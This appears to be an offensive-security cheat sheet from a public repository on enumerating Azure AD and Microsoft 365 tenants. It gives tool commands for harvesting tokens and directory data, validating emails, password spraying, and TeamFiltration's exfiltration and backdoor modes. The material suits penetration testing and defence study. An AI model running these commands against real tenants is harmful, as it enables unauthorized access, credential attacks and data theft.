azure-enumeration.md (12200B)
1 --- 2 title: "Azure AD - Enumerate" 3 section: "Cloud" 4 sectionSlug: "cloud" 5 sourcePath: "docs/cloud/azure/azure-enumeration.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/azure/azure-enumeration.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Azure AD - Enumerate 12 13 ## Azure AD - Collectors 14 15 * [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites 16 * [**dirkjanm/ROADTool**](https://github.com/dirkjanm/ROADtools) - A collection of Azure AD tools for offensive and defensive security purposes 17 18 ```ps1 19 roadrecon auth --access-token eyJ0eXA... 20 roadrecon auth --prt-cookie <primary-refresh-token> -r msgraph -c "1950a258-227b-4e31-a9cf-717495945fc2" 21 roadrecon gather 22 roadrecon gui 23 ``` 24 25 * [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound 26 27 ```ps1 28 ./azurehound --refresh-token <refresh-token> list --tenant "<target-tenant-id>" -o output.json 29 ./azurehound -u "<username>@contoso.onmicrosoft.com" -p "<password>" list groups --tenant "<tenant>.onmicrosoft.com" 30 ./azurehound -j "<jwt>" list users --tenant "<tenant>.onmicrosoft.com" 31 ``` 32 33 * [**BloodHoundAD/BARK**](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit 34 35 ```ps1 36 . .\BARK.ps1 37 $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com" 38 $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com" 39 $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress 40 ``` 41 42 * [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API 43 44 ```ps1 45 Invoke-GraphRecon -Tokens $tokens -PermissionEnum 46 Invoke-DumpCAPS -Tokens $tokens -ResolveGuids 47 Invoke-DumpApps -Tokens $tokens 48 Get-DynamicGroups -Tokens $tokens 49 ``` 50 51 * [**NetSPI/MicroBurst**](https://github.com/NetSPI/MicroBurst) - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping 52 53 ```powershell 54 PS C:> Import-Module .\MicroBurst.psm1 55 PS C:> Import-Module .\Get-AzureDomainInfo.ps1 56 PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose 57 ``` 58 59 * [**hausec/PowerZure**](https://github.com/hausec/PowerZure) - PowerShell framework to assess Azure security 60 61 ```powershell 62 Import-Module .\Powerzure.psd1 63 Set-Subscription -Id [idgoeshere] 64 Get-AzureTarget 65 Get-AzureInTuneScript 66 Show-AzureKeyVaultContent -All 67 ``` 68 69 * [**silverhack/monkey365**](https://github.com/silverhack/monkey365) - Microsoft 365, Azure subscriptions and Microsoft Entra ID security configuration reviews. 70 71 ```powershell 72 Get-ChildItem -Recurse c:\monkey365 | Unblock-File 73 Import-Module C:\temp\monkey365 74 Get-Help Invoke-Monkey365 75 Get-Help Invoke-Monkey365 -Examples 76 Get-Help Invoke-Monkey365 -Detailed 77 ``` 78 79 * [**prowler-cloud/prowler**](https://github.com/prowler-cloud/prowler) - Prowler is an Open Source Security tool for AWS, Azure, GCP and Kubernetes to do security assessments, audits, incident response, compliance, continuous monitoring, hardening and forensics readiness. Includes CIS, NIST 800, NIST CSF, CISA, FedRAMP, PCI-DSS, GDPR, HIPAA, FFIEC, SOC2, GXP, Well-Architected Security, ENS and more 80 * [**projectdiscovery/nuclei-templates**](https://github.com/projectdiscovery/nuclei-templates/tree/main/cloud/azure) - Community curated list of templates for the nuclei engine to find security vulnerabilities. 81 82 ```ps1 83 nuclei -t ~/nuclei-templates/cloud/azure/ -code -v 84 ``` 85 86 * [**nccgroup/ScoutSuite**](https://github.com/nccgroup/ScoutSuite) - Multi-Cloud Security Auditing Tool 87 * [**Flangvik/TeamFiltration**](https://github.com/Flangvik/TeamFiltration) - TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts 88 89 ```ps1 90 TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all 91 TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --aad 92 TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa 93 TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000 94 TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive 95 TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams 96 TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt 97 TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --backdoor 98 TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --database 99 ``` 100 101 * [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - :warning: This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects 102 * [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) - :warning: This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks. 103 * [**FSecureLABS/Azurite**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud. 104 * [**cyberark/SkyArk**](https://github.com/cyberark/SkyArk) - :warning: This repository has not been updated recently - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins. 105 106 ## Azure AD - User Enumeration 107 108 ### Enumerate Tenant Informations 109 110 * Federation with Azure AD or O365 111 112 ```powershell 113 Get-AADIntLoginInformation -UserName <USER>@<TENANT NAME>.onmicrosoft.com 114 https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1 115 https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1 116 ``` 117 118 * Get the Tenant ID 119 120 ```powershell 121 Get-AADIntTenantID -Domain <TENANT NAME>.onmicrosoft.com 122 https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration 123 https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration 124 ``` 125 126 ### Enumerate from a Guest Account 127 128 ```ps1 129 powerpwn recon --tenant {tenantId} --cache-path {path} 130 powerpwn dump -tenant {tenantId} --cache-path {path} 131 powerpwn gui --cache-path {path} 132 ``` 133 134 ### Enumerate Emails 135 136 > By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute. 137 138 * Validate email 139 140 ```powershell 141 PS> C:\Python27\python.exe C:\Tools\o365creeper\o365creeper.py -f C:\Tools\emails.txt -o C:\Tools\validemails.txt 142 admin@<TENANT NAME>.onmicrosoft.com - VALID 143 root@<TENANT NAME>.onmicrosoft.com - INVALID 144 test@<TENANT NAME>.onmicrosoft.com - VALID 145 contact@<TENANT NAME>.onmicrosoft.com - INVALID 146 ``` 147 148 * Extract email lists with a valid credentials : [nyxgeek/o365recon](https://github.com/nyxgeek/o365recon) 149 150 ```powershell 151 Install-Module MSOnline 152 Install-Module AzureAD 153 .\o365recon.ps1 -azure 154 ``` 155 156 ### Password Spraying 157 158 The default lockout policy tolerates 10 failed attempts, then lock out an account for 60 seconds. 159 160 * [dafthack/MSOLSpray](https://github.com/dafthack/MSOLSpray) 161 162 ```powershell 163 PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1 164 PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password <PASSWORD> -Verbose 165 PS> Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020 166 PS> Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme! 167 ``` 168 169 * [0xZDH/o365spray](https://github.com/0xZDH/o365spray) 170 171 ```powershell 172 o365spray --spray -U usernames.txt -P passwords.txt --count 2 --lockout 5 --domain test.com 173 ``` 174 175 * [Flangvik/TeamFiltration](https://github.com/Flangvik/TeamFiltration) 176 177 ```powershell 178 TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions 179 TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt 180 TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00 181 ``` 182 183 ## Azure Services Enumeration 184 185 ### Enumerate Tenant Domains 186 187 Extract openly available information for the given tenant: [aadinternals.com/osint](https://aadinternals.com/osint/) 188 189 ```ps1 190 Invoke-AADIntReconAsOutsider -DomainName <DOMAIN> 191 Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table 192 Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table 193 ``` 194 195 ### Enumerate Azure Subdomains 196 197 ```powershell 198 PS> . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1 199 PS> Invoke-EnumerateAzureSubDomains -Base <TENANT NAME> -Verbose 200 Subdomain Service 201 --------- ------- 202 <TENANT NAME>.mail.protection.outlook.com Email 203 <TENANT NAME>.onmicrosoft.com Microsoft Hosted Domain 204 ``` 205 206 ### Enumerate Services 207 208 * Using Az Powershell module 209 210 ```powershell 211 # Enumerate resources 212 PS Az> Get-AzResource 213 214 # List all VM's the user has access to 215 PS Az> Get-AzVM 216 217 # Get all webapps 218 PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"} 219 220 # Get all function apps 221 PS Az> Get-AzFunctionApp 222 223 # List all storage accounts 224 PS Az> Get-AzStorageAccount 225 226 # List all keyvaults 227 PS Az> Get-AzKeyVault 228 229 # Get all application objects registered using the current tenant 230 PS AzureAD> Get-AzureADApplication -All $true 231 232 # Enumerate role assignments 233 PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME> 234 PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com 235 236 # Check AppID Alternative Names/Display Name 237 PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl 238 ``` 239 240 * Using az cli 241 242 ```powershell 243 PS> az vm list 244 PS> az vm list --query "[].[name]" -o table 245 PS> az webapp list 246 PS> az functionapp list --query "[].[name]" -o table 247 PS> az storage account list 248 PS> az keyvault list 249 ``` 250 251 ## Multi Factor Authentication 252 253 * [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services 254 255 ```ps1 256 Import-Module .\MFASweep.ps1 257 Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 258 Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Recon -IncludeADFS 259 ``` 260 261 ## References 262 263 * [Bypassing conditional access by faking device compliance - @DrAzureAD - September 06, 2020](https://o365blog.com/post/mdm/) 264 * [CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course](https://github.com/0xJs/CARTP-cheatsheet/blob/main/Authenticated-enumeration.md) 265 * [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps - Ryan Hausknecht - Jan 28, 2020](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a) 266 * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab) 267 * [Azure Config Review - Nuclei Templates v10.0.0 - Prince Chaddha - Sep 12, 2024](https://blog.projectdiscovery.io/azure-config-review-with-nuclei/)